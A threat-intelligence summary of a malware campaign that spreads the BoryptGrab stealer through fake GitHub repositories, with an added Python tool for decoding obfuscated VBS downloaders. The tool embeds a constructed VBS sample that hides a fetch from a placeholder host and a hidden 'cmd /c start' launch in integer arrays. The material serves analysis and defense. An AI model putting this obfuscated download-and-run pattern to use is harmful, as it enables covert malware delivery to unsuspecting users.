GitHub Malware Operation Spreads Dangerous BoryptGrab Stealer
- Mar 8
Key Findings
BoryptGrab information stealer spreading through over 100 GitHub repositories
Malware designed to collect browser data, cryptocurrency wallets, system details, and user files
Some variants deploy a PyInstaller backdoor called TunnesshClient for remote command execution
Background
Trend Micro has uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories. BoryptGrab is capable of collecting sensitive data such as browser and cryptocurrency wallet information, system details, and common user files.
Malware Distribution
The malware is distributed as ZIP archives posing as software tools and game cheats, linked from the GitHub repositories
Repositories stuffed with SEO keywords to rank higher in search results
Fake download pages redirect victims through encoded URLs to malicious ZIP files
Infection Vectors
The bundled executable side-loads a malicious libcurl.DLL, which decrypts a hidden launcher payload
The launcher downloads the BoryptGrab stealer and may retrieve further payloads, such as the Vidar stealer, the TunnesshClient backdoor, and the HeaconLoad downloader
A VBS downloader hides its commands in integer arrays and fetches the launcher, which in turn retrieves BoryptGrab
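The integer-array trick mentioned above is cheap for an analyst to undo statically. The decoder below is an added example, not code from the Trend Micro report or from the campaign itself; the VBS sample inside it is constructed for illustration, and the "subtract a constant before Chr()" variant it also handles is an assumed variation, not one the report describes.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample (NOT from the Trend Micro report): a VBS downloader that
# keeps its download URL in one integer array (plain ASCII) and its launch
# command in another (each byte stored as value + 7), rebuilding both with
# Chr() inside For loops before fetching and running the payload.
SAMPLE_VBS = r'''
u = Array(104,116,116,112,58,47,47,116,46,105,110,118,97,108,105,100,47,108)
c = Array(106,116,107,39,54,106,39,122,123,104,121,123,39,115,53,108,127,108)
For i = 0 To UBound(u)
    url = url & Chr(u(i))
Next
For i = 0 To UBound(c)
    cmd = cmd & Chr(c(i) - 7)
Next
Set x = CreateObject("MSXML2.XMLHTTP")
x.Open "GET", url, False
x.Send
Set sh = CreateObject("WScript.Shell")
sh.Run cmd, 0, False
'''

# name = Array(12, 34, ...)   -> the hidden byte values
ARRAY_RE = re.compile(r'\b(\w+)\s*=\s*Array\(\s*([\d\s,]+?)\s*\)', re.IGNORECASE)
# Chr(name(i)), Chr(name(i) - 7), Chr(name(i) + 3), Chr(name(i) Xor 5)
# -> which array feeds Chr() and what arithmetic is applied first
CHR_RE = re.compile(
    r'\bChr\(\s*(\w+)\(\w+\)\s*(?:([-+]|Xor)\s*(\d+))?\s*\)', re.IGNORECASE)


def find_arrays(vbs: str) -> Dict[str, List[int]]:
    """Return every `name = Array(int, int, ...)` assignment as name -> ints."""
    arrays: Dict[str, List[int]] = {}
    for m in ARRAY_RE.finditer(vbs):
        arrays[m.group(1)] = [int(v) for v in m.group(2).split(',') if v.strip()]
    return arrays


def find_transforms(vbs: str) -> Dict[str, Optional[Tuple[str, int]]]:
    """Map each array name used inside Chr() to the arithmetic applied to its
    elements: None for Chr(a(i)), ('-', 7) for Chr(a(i) - 7), ('xor', 5) ..."""
    transforms: Dict[str, Optional[Tuple[str, int]]] = {}
    for m in CHR_RE.finditer(vbs):
        name, op, n = m.group(1), m.group(2), m.group(3)
        transforms[name] = None if op is None else (op.lower(), int(n))
    return transforms


def apply_transform(value: int, transform: Optional[Tuple[str, int]]) -> int:
    """Undo the per-element arithmetic the script performs before Chr()."""
    if transform is None:
        return value
    op, n = transform
    if op == '-':
        return value - n
    if op == '+':
        return value + n
    if op == 'xor':
        return value ^ n
    raise ValueError(f'unsupported operator {op!r}')


def decode_arrays(vbs: str) -> Dict[str, str]:
    """Decode each integer array to the string the script rebuilds at run time.
    Arrays never passed to Chr() are decoded as plain ASCII as a best effort;
    non-printable results are shown as \\xNN so a wrong guess is visible."""
    transforms = find_transforms(vbs)
    decoded: Dict[str, str] = {}
    for name, values in find_arrays(vbs).items():
        codes = [apply_transform(v, transforms.get(name)) for v in values]
        decoded[name] = ''.join(
            chr(c) if 32 <= c < 127 else f'\\x{c & 0xff:02x}' for c in codes)
    return decoded


if __name__ == '__main__':
    for name, text in decode_arrays(SAMPLE_VBS).items():
        print(f'{name} -> {text}')
```

Run against the constructed sample, the decoder prints the download URL and the launch command the script would otherwise only reveal at execution time; pointing it at a real downloader is a matter of replacing SAMPLE_VBS with the file contents. Anything that comes out with `\xNN` escapes means the array uses an encoding the three handled operators do not cover and the loop body needs to be read by hand.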
BoryptGrab Capabilities
Designed to collect large amounts of sensitive data from infected systems
Accepts command-line arguments that set the output path and a build name, which the operators use to track individual infections
Performs anti-analysis checks, such as detecting whether it is running inside a virtual machine or with elevated privileges
Potential Russian Origins
Russian-language comments in the code and the supporting infrastructure suggest the threat actors may have a Russian background
Consistent URL-fetching logic and overlapping tactics across the samples indicate a single coordinated campaign rather than unrelated actors
Sources
https://securityaffairs.com/189110/malware/massive-github-malware-operation-spreads-boryptgrab-stealer.html
https://www.reddit.com/r/pwnhub/comments/1rndi3o/over_100_github_repositories_spreading_boryptgrab/